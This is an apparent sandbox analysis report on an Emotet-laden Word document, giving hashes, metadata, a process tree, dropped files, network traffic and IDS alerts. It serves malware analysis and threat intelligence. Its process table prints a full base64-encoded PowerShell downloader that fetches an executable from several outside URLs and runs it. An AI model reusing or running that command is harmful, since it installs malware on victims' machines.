File name: | pack_08_11_2019.doc |
Full analysis: | https://app.any.run/tasks/72297df4-2c37-4dc4-9231-2095a2375d19 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 16:40:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ex doloribus natus., Author: Valr Haluka, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 21:40:00 2019, Last Saved Time/Date: Thu Nov 7 21:40:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0 |
MD5: | 5CCF5EAF5A5260BF33C72E306310020A |
SHA1: | D7A0566F525DF8C9A2C65CAC1ED3862B46A224DF |
SHA256: | 204CDFE38E065AA1EE1B0A11595D12444C7C03B65A6E84AE9F93A9C1BB7E2A08 |
SSDEEP: | 6144:BA8XtzSHNaq8SzGdD48+avOnaUsZyczsC6nHZ:BA8Xtz8aVWGe8+6OnSo86HZ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 204 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 175 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:11:07 21:40:00 |
CreateDate: | 2019:11:07 21:40:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Valér Haluška |
Subject: | - |
Title: | Ex doloribus natus. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\pack_08_11_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1992 | powershell -enco JABYAG4AcgB1AGgAdQBnAHYAPQAnAFQAcAB3AHYAdABzAHoAcwB0ACcAOwAkAEsAcgBnAHoAcgBtAHgAaAB2AHQAbwAgAD0AIAAnADQAMgAwACcAOwAkAEoAaABqAGwAcgBjAGoAeQBnAHkAPQAnAEYAdQBqAGoAZQB3AHYAdgBxAG0AJwA7ACQAVQB6AG4AdQBtAGQAaQBiAGQAbQBxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHIAZwB6AHIAbQB4AGgAdgB0AG8AKwAnAC4AZQB4AGUAJwA7ACQAVQByAGQAcAB3AGEAdQBhAGYAbAA9ACcATAB3AGMAZABsAHYAeQB1AGYAbQAnADsAJABXAG4AaQB6AGwAeQBiAHoAeAB6AHgAbgB1AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUATgB0ADsAJABDAGoAeQBmAGwAcABmAGgAagA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHUAawBoAHQAaQBuAGEAZABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADAANABrAHgAZgA5ADQALwAqAGgAdAB0AHAAOgAvAC8AcwBlAGEAdAB3AG8AbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYgA3AG8AOQA5ADQANgAyAC8AKgBoAHQAdABwADoALwAvAGEAYwBvAG4AcwB1AGwAdABhAG4AYwB5AC4AYwBvAG0ALwBJAE4AQwAvAG8AcgA1ADUANQAyADYAOQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAYQB2AGkAZABzAC4AYwBsAHUAYgAvAGMAYQBsAGUAbgBkAGEAcgAvAHMAMQBoADQANAAvACoAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AG0AYwBuAGEAbQBhAHIAYQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAHgAaQAyAHIAMwA0AG0ANAA4AC8AJwAuACIAUwBgAHAATABJAFQAIgAoACcAKgAnACkAOwAkAEkAcQBuAHgAcABhAHYAeAB1AHkAcgBhAHkAPQAnAEcAZQBpAGYAdQBxAHoAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB0AGQAZQBrAG0AbQB4AGEAbwBpAGMAZQAgAGkAbgAgACQAQwBqAHkAZgBsAHAAZgBoAGoAKQB7AHQAcgB5AHsAJABXAG4AaQB6AGwAeQBiAHoAeAB6AHgAbgB1AC4AIgBEAG8AdwBOAEwATwBgAEEAYABEAGYASQBsAEUAIgAoACQAQgB0AGQAZQBrAG0AbQB4AGEAbwBpAGMAZQAsACAAJABVAHoAbgB1AG0AZABpAGIAZABtAHEAKQA7ACQAUgBqAHUAbgBzAGUAaQBiAGUAZwBmAG0APQAnAEUAcABnAHAAbQBlAGMAZgBzAHQAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAHoAbgB1AG0AZABpAGIAZABtAHEAKQAuACIATABgAEUAbgBnAFQAaAAiACAALQBnAGUAIAAzADQAMgA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAHQAIgAoACQAVQB6AG4AdQBtAGQAaQBiAGQAbQBxACkAOwAkAEcAdgBpAGoAcwBlAGQAeQByAGEAagBjAHUAPQAnAFQAbgB3AHQAZwB5AGIAZQBqAGsAbABkAHIAJwA7AGIAcgBlAGEAawA7ACQAQgB1AGIAaABiAGcAdgB4AG4AaQB0AD0AJwBQAHcAbgBzAHcAZABsAGUAeAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAcgB6AHkAZwBhAG0AbABhAHoAbwBhAG0APQAnAFgAcABpAGwAbgBsAG8AcABtAHgAdABoACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2796 | "C:\Users\admin\420.exe" | C:\Users\admin\420.exe | — | powershell.exe |
User: admin Company: Azzouzi Software Integrity Level: MEDIUM Description: Hotspot Service Exit code: 0 Version: 16.0.0.0 | ||||
2848 | --2e6e6c30 | C:\Users\admin\420.exe | 420.exe | |
User: admin Company: Azzouzi Software Integrity Level: MEDIUM Description: Hotspot Service Exit code: 0 Version: 16.0.0.0 | ||||
3908 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 420.exe |
User: admin Company: Azzouzi Software Integrity Level: MEDIUM Description: Hotspot Service Version: 16.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA91B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OAIXV1MOWN87G2S91J2W.temp | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8B378DCC62035BBABEF8B1C2A131A338 | SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:A87506B066B2F6B885B624437F8A3E22 | SHA256:3D867ACF96A5E3BEE1D7EDEA3D2A9D77A1ABC63A198C131839AACFDBBBC0EB8E | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F765A58E.wmf | wmf | |
MD5:DB841CAE1A6B9522E40F070D3A6154CB | SHA256:FCC58A285402B415246B6BCD50D374AD5C6A5D494E4DA0EAA47A51D92D80FFA9 | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74E07465.wmf | wmf | |
MD5:FCB2EDDCB2634A6EB0B0F9CA00C37F85 | SHA256:008D7F69481F12971260D755005F421FA14795C9002D68318693A664A6AD5E02 | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E4E7380.wmf | wmf | |
MD5:00357E66D1AD1883A8C2188F43F668E1 | SHA256:4EF0D5E105D6C892FBDCD015593B7A978980305AE50D0AF6A7CBF7542A7B980D | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDAEB4BA.wmf | wmf | |
MD5:3892DEE29AE89368BA9EEB0893DBCBA9 | SHA256:EF8685755D7175F0BCC72CEAE1A415C9788518C853F863039E250F5D115978B5 | |||
1992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B3288BB.wmf | wmf | |
MD5:5F07F6827F1F53DE0DB96BADD744E08E | SHA256:427A345C732A0A9F1A094253291C2593024DA1094633DA18720DC791DC33FAB6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1992 | powershell.exe | GET | 200 | 111.68.116.163:80 | http://www.ukhtinada.com/wp-content/uploads/04kxf94/ | ID | executable | 277 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1992 | powershell.exe | 111.68.116.163:80 | www.ukhtinada.com | Varnion Technology Semesta, PT | ID | suspicious |
Domain | IP | Reputation |
---|---|---|
www.ukhtinada.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1992 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1992 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1992 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |